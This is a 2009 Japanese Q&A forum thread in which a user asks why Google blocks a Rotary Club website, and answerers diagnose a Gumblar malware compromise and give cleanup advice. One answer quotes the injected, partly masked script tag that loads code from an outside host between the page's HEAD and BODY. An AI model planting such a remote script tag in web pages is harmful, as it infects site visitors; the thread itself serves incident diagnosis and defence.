こんにちはゲストさん。会員登録(無料)して質問・回答してみよう!

締切り済みの質問

googleで危険と判定され、ブロックされたwebサイトについて

家内が制作を請け負っているwebサイトが、先月からgoogleでブロックされたまま解除されません。URL:http://www.yasurc.***/ です。
このサイトは国際的奉仕団体であるロータリークラブの支部のもので、決しておかしなサイトではありません。googleの判定によれば、
「このウェブサイトにアクセスすると、コンピュータに損害が生じる可能性があります。」とのことで、セーフブラウジングのページを開くと、「yasurc.*** の現在のステータス:疑わしいサイトとして認識されています。このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。
過去 90 日間に、このサイトの一部で不審な動きが 1 回報告されています。
Google による巡回テスト状況:このサイトで過去 90 日間に Google がテストした 13 ページのうち 3 ページで、ユーザーの同意なしに不正なソフトウェアがダウンロードされ、インストールされていたことが判明しました。Google が最後にこのサイトを巡回したのは2009-12-10で、このサイトで不審なコンテンツが最後に検出されたのは2009-11-17です。」という内容で、どうもスパイウェアに感染したような意味にとれます。 一度原ファイルをウィルスソフトで完全スキャンした上で、サーバー上のすべてのファイルを削除し、改めてサイトを転送し直しましたが、未だに上記の表示が出ます。ただ、11/17以降はその不審なコンテンツは見つかっていないようなので、今のwebページはたぶん大丈夫のようです。googleのこのブロックを解除する方法がわかりません。どなたかご教授願います。ちなみに、gooやyahoo!から検索すると何も引っかかりません。 

投稿日時 - 2009-12-20 21:55:53

QNo.5536604

すぐに回答ほしいです

このQ&Aは役に立ちましたか?

10人が「このQ&Aが役に立った」と投票しています

回答(5)

ANo.5

大変でしょうが、ご検討をお祈りします。
ウイルスが片付きましたら、サイトのファイルを点検もしくは、全削除してアップロードしなおして、デトロイトのサーバーのように、ウイルスもしくはそのダウンロードスクリプトの置き場にされる懸念を払拭してください。ハードディスク付きテレビでさえボットネットに取り込まれる時世ですから。
「家電もマルウェアに感染する時代」
http://www.itmedia.co.jp/enterprise/articles/0912/22/news006.html

まだ、この相談は閉じられてないようですから蛇足ながら読者の参考になればと、ここを借りてGumblar系ウイルスについて最近の状況を記しておきます。

Gumblar系ウイルスはごく普通のサイトに仕掛けられています。サイト管理者も換算されたことを知らないで他人から知らされるのがほとんどです。
そして統計的なデータでは日本のインターネット加入者15人に一人は自分のPCが感染している事を知りません。
その数値の根拠は「実はBlasterやNetsky並み? 静かにはびこるGumblar」
http://www.atmarkit.co.jp/fsecurity/column/kawaguchi/021.html
にあります。

最近ニュースになったホットなものには、
「JR東日本のサイトが約2週間にわたり改ざん状態 - 閲覧でウイルス感染のおそれ」
http://www.security-next.com/011734.html
というように、感染サイトを選びません。
セキュリティソフトメーカーには、もっと対策努力を期待します。現状はザルよりひどい状況と言わざるを得ません。感染したPCではもはやそのウイルスを検出できないという悩ましい状況もあります。

対策(自己防衛策)は
「相次ぐ「Webウイルス」に緊急警告、Adobe ReaderやFlashを最新版に」
http://pc.nikkeibp.co.jp/article/news/20091224/1021789/
それと、WindowsUpdate・MicrosoftUpdateの最新版を適応しておくこと、IE7以前のブラウザを使用しないことなどが挙げられます。
一応12月7日のセキュリティ更新プログラムで対策されましたけど、この更新前のIE6やIE7で改ざんされたサイトを閲覧したら防ぎようが無かったのです。
http://www.microsoft.com/japan/technet/security/bulletin/ms09-072.mspx

ネット加入者15人に一人は感染者。決して人事ではない数字の筈です。

投稿日時 - 2009-12-24 16:44:52

お礼

重ね重ねありありがとうございました。大変参考になりました。インターネットは便利な反面、怖い面があることを改めて教えて頂きました。

投稿日時 - 2009-12-24 21:12:35

ANo.4

No.3です。
現在、デトロイトの個人宅サーバーは稼動中です。
問題のスクリプトは、5.6Kバイトの暗号化されたスクリプトでした。
Kaspersky で Trojan-Downloader.JS.Gumblar.x
Trendmicroではない同名のVirusBuster で JS.Crypt.DMX
として検出されます。Gumblarスクリプトの検出率はいつもこの程度です。
http://www.virustotal.com/jp/analisis/98eca65a2b409df496b101c48c4a40f51794243ddc314d2995ca89512d80f1e9-1261356115

FTPによる改ざんなら、OCNにver/log/xferlogの調査を依頼して、特に海外IPからのFTP接続が無いか調べてもらってください。
ご使用のOCNのWebサーバーが調査ではRapidsite/Apaと出るのですが、ターミナル(SSH)のセキュリティに脆弱性があるようにも見うけられます。
http://www.osbsd.net/2005/08/rapidsiteapa.html
SSHへの攻撃やLoginは同様にver/log/messagesに記録されていますので調べてもらってください。
IPA(独立行政法人情報処理推進機構)に届けを出すためにLOGを貰うと良いでしょう。
またIPAで指導もしてもらえるでしょう。
http://www.ipa.go.jp/security/index.html

投稿日時 - 2009-12-21 11:00:03

お礼

再度、大変詳しい説明をしていただき、感謝の言葉もありません。ただ、このレベルまでくると、私の拙い知識では対処しかねますので、いただいた情報をもとに専門業者に頼んでみようと思います。重ね重ねありがとうございました。

投稿日時 - 2009-12-22 22:58:32

ANo.3

サイトのトップページを調べさせていただきました。
URLは伏字にしましたが、次の2行目に覚えがなければバッチリ【改ざん】されています。
----------------------------
</HEAD>
<script src=http://***.us/***/robots.php ></script>
<BODY background="syuho/kabe27.jpg" link="#0000ff">
----------------------------
暗号化されていないためカスペルスキーやavast!でも無警告です。
挿入位置は、5月頃のGumblarと同じく</HEAD>と<BODY>の間です。
改ざん犯は以前と違ってスクリプトを暗号化しなくなっています。
このアドレスはデトロイトの個人宅サーバーのようですが、私のアクセスした時間には稼動していなかったようで、指定されたスクリプトにアクセスできませんでした。
稼動中なら感染攻撃を受けたでしょう。
この作業は危険ですのでまねしないように。

googleの警告は全く正しく行われていると言えるでしょう。

考えられる事は、moto-kitさんの奥様のPCもしくはPCの繋がっているLANのPCやサーバーがGumblar系のウイルスに感染しています。
最近のGumblarウイルスはほとんど症状に気がつきません。またウイルス対策ソフトから身を隠す術を持っています。
ウイルス定義の自動更新ができていないなら感染可能性大です。
手動でもウイルス定義が更新できないようでしたら、職業上PCのリカバリをお勧めします。また、サイトのFTPパスワードの変更も必要です。
FTPログインする人が他にいるなら、そちらに感染があるのかも知れません。

投稿日時 - 2009-12-21 02:11:03

お礼

大変詳しい解説と、危険を伴う分析までしていただき、ありがとうございました。ソースを確認したのですが、ご指摘頂いたスクリプトの記述は、もちろん覚えがありませんが、どこにあるのか私には見つけられませんでした。ただ、googleに再審査依頼をしたところ、やはり状態は同じでしたので、改善はされていませんでした。PCのリカバリは、その手間を考えると逡巡してしまうのですが、検討させて頂きます。FTPパスワードは変更してみます。他にはログインする人はいません。

投稿日時 - 2009-12-22 22:56:22

ANo.2

まずホームページが改ざんされた方が大問題です。
ドメインでIPアドレスを調べたところ、たぶん、OCNまたはNTTコミュニケーションズのレンタルサバーようです。
なので、上記契約プロバイダーへの報告と原因解明を行ってください。

投稿日時 - 2009-12-20 23:24:36

補足

ご回答ありがとうございます。ご指摘のとおり、OCNのホスティングサービスを利用していますので、OCNに原因究明を依頼してみたのですが、わかないという返事でした。いくつかアドバイスももらいましたが、あまり役に立ちませんでした。

投稿日時 - 2009-12-21 00:57:34

お礼

ありがとうございました。OCNのホスティングサービスを利用していますので、連絡して対応方法を聞いたのですが、思わしい回答はありませんでした。

投稿日時 - 2009-12-22 22:48:15

ANo.1

サイトの再審査をリクエストする

http://www.google.com/support/webmasters/bin/answer.py?answer=45432#3

使用したことがありませんが、どうでしょうか。

投稿日時 - 2009-12-20 22:37:52

お礼

ありがとうございます。再審査を依頼したところ、やはり感染しているようでした。

投稿日時 - 2009-12-22 22:46:35

あなたにオススメの質問